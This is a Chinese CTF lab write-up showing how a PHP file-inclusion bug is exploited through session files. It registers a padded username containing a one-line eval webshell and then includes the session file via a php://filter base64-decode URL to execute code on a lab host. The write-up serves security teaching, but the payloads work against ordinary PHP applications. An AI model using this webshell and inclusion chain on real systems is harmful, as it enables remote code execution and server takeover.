文件包含漏洞之包含SESSION(CTF题目)

这次使用的环境是ubuntu+nginx+php+mysql

首先四个文件源码在以下链接中:

一道CTF题:PHP文件包含 | Chybeta

我们注册一个用户名111密码111,然后登录查看cookie和linux的session,因为我们的de服务器

是手动搭建的,所以容易知道session的位置。

我们查看这个session:

复制代码
cd /var/lib/php/sessions

发现我们的用户名以base64编码的格式放在了session中,因此我们只要把含有木马的用户名注册了,这个木马就会以base64编码的格式放在session中,并且路径我们也是知道的。

我们把一句话木马注册,可以看到木马已经被放进数据库里面了,session中也存在

15

复制代码
192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_hej7e9k4vjusbpumknkvsks5f1

但是上面的payload不能执行,因为session中还包含着15位的前缀,需要让其乱码

需要重新注册一个base64编码后的名字长度大于100的

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>

重复上述步骤

注册这个用户名:

复制代码
chybetachybetachybetachybetachybetachybetachybetachybetachybeta<?php eval($_GET['atebyhc']) ?>
复制代码
http://192.168.87.134/session_upload/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php/sessions/sess_bhbl2nhonauub8vko76g2ublkt&atebyhc=phpinfo();

成功!

相关推荐
virelin_Y.lin9 小时前
系统与网络安全------Windows系统安全(9)
windows·web安全·系统安全·iis
上线之叁10 小时前
小迪安全110-tp框架,版本缺陷,不安全写法,路由访问,利用链
安全
计算机毕设定制辅导-无忧学长10 小时前
TDengine 权限管理与安全配置实战(二)
大数据·安全·tdengine
☞无能盖世♛逞何英雄☜12 小时前
Upload-labs靶场通关
安全
zhu128930355612 小时前
网络安全防护与挑战
网络·安全·web安全
神经毒素14 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
DPLSLAB614 小时前
数字孪生重构安全边界:无人机 “虚拟孪生体“ 的预演革命 —— 北京智慧云测构建全要素仿真体系
安全·重构·无人机
蒜白15 小时前
28--当路由器开始“宫斗“:设备控制面安全配置全解
安全·网络工程师·路由·ospf·bgp
扣脚大汉在网络16 小时前
云原生安全渗透篇
安全·云原生·dubbo
vortex517 小时前
Windows 权限配置文件解析与安全分析(GPP,GPO,LSA)
windows·安全·渗透测试